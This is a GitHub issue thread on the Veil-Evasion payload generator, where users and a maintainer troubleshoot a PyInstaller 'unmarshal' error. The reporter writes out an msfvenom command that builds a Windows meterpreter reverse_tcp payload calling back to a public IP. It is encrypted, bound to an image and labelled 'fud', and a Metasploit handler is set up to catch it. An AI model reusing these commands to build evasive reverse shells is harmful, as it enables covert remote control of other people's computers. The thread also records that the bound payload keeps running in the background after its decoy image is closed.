### ISSUE TITLE
Failed to unmarshal code object for pyiboot01_bootstrap

### ISSUE THREAD

**Issue by cacaocaca** [Veil-Framework/Veil-Evasion#375]
## Veil-Evasion version
 Veil-Evasion | [Version]: 2.28.1

## OS Used - all info (architecture, linux flavor, etc)
Linux kali 4.6.0-kali1-686-pae #1 SMP Debian 4.6.3-1kali1 (2016-07-12) i686 GNU/Linux

## Pastebin link to error you are encountering (include console actions you took prior to error)
https://s31.postimg.org/5y5hubjln/veil.png

## Any additional info you want to tell me
Thanks for your update but somenthing don't work still.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=79.32.99.254 LPORT=443 -f raw -e generic/none -i 1 -o /root/Scrivania/fud.raw
python/shellcode_inject/des_encrypt
USE_PYHERION=Y
Use Raw =  /root/Scrivania/fud.raw
Use Binder for binder image compression LZMA.
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.100
lhost => 192.168.0.100
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set ExitOnSession false 
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.100:443 
[*] Starting the payload handler...
At the end i dont have meterpreter session and he show me https://s31.postimg.org/5y5hubjln/veil.png

**Comment by veil-evasion** [comment]
I need the exact pastebin link to a copy and paste from both of your consoles (MSF and veil). Please provide the complete dump, and paste the links here.

At first glance, I don't believe Veil-evasion has supported raw outputs in the way you are doing it.

**Comment by cacaocaca** [comment]
I have already try without .raw and choose just msfvenom normal on veil with again   python/shellcode_inject/des_encrypt 
 USE_PYHERION=Y and afther binder with easy binder  i always use it with veil and never I've had problems until now 
He show me same error the problem is again about pyinstaller some thing don t work again .. And i can t show all output of veil..  Veil delete all output automatic .
http://pastebin.com/vpRw7Z1N

**Comment by ChrisTruncer** [comment]
Again,

I need the full dump of your console.  Veil-Evasion doesn't delete anything, just scroll up.

**Comment by ChrisTruncer** [comment]
Also, I did test on a brand new Kali VM with the latest version of Veil-Evasion that it successfully creates a python payload, and I did not encounter that error.

**Comment by cacaocaca** [comment]
I share video so you can look 2 things
1. Veil delete output on my terminal but just veil you can look output while he work
2. I make clear payload and he show me  error of pyiboot01_bootstrap and don t have session .
https://s32.postimg.org/iandnnd11/veil.jpg
https://mega.nz/#!VEkn2IhC!qyk7rdAmbFioSrX6Tub-AqEC3nR2ZVdz4brniqWn0Po

**Comment by ChrisTruncer** [comment]
You're doing things to it which we've never tried, and I can't say for sure if it works.  You're editing the executable, adding some compression, and hoping it still works.  I am not sure how easily pyinstaller works with that.

I can state that using a brand new Kali VM, it installs fine, and generates python based payloads that work right out of Veil.  Please test that out.

**Comment by cacaocaca** [comment]
Some month ago have already use veil and use binder with different compression lzma ecc  and work but if do you want later i try without binder and without compression but i think that are same..I  can try so with another pc for look if is problem of windows machine .

**Comment by ChrisTruncer** [comment]
Please, just try a regular payload on a new system without doing anything to it.  That will work.  Then you will be able to test and see it is isolated to the actions you are taking after the payload has been generated

**Comment by cacaocaca** [comment]
I tried it now payload clean python/shellcode_inject/des_encrypt without binder or change icon ecc so i've  tried on the last machine again and show me same error so the same file i've tried on another machine with result same error again i think codewarrior0 can help you to fix .

**Comment by ChrisTruncer** [comment]
Unfortunately, I've tried this now on two different physical machines with virtual machine running on them.  Both are clean installs of Veil-Evasion to test the install process along with the latest patch and ensure nothing else on the system is impacting the use of Veil-Evasion.

I am not able to recreate this right now.  I'm thinking it has to do with your modified VM and the actions you are taking on payloads after they have been generated.  This is not something where anyone else needs to get involved with because I don't have evidence that I can generate where I believe it is something other than your system right now.

I'm sorry, but please test a new Kali VM, install Veil-Evasion on it, and it should work for you.

**Comment by cacaocaca** [comment]
Chris I have solve with half a brain work so with binder and if i close windows image the payload still run on task manager i have listen you  so you said me if is my problem of kali if is clean  so I thought  if my payload work with unicorn good and with binder this is problem of Veil ? So what installing or use veil during installation that can corrupt the payload  Python 2.7 PyCrypto Pyinstaller PyWin32  ecc so I thought if i delete old directory /root/.config/wine/veil and rerun setup.sh -c i can solve the problem and it did :) thanks for your idea you made me thought and solve it .

**Comment by hawaii67** [comment]
Just as an information - I had exactly the same issue (simple payload python/shellcode_inject/aes_encrypt), on a heavily used and reconfigured Kali version (of course, who is not doing that?? Using always a brand new Kali VM is no option). But I made it work again by changing WINEPREFIX from ~/.config/wine/veil back to ~/.wine in setup.py and settings.py. Weird, n'est-ce pas? 
To boot there was an issue with PyInstaller 3.2 which was fixed by it as well.
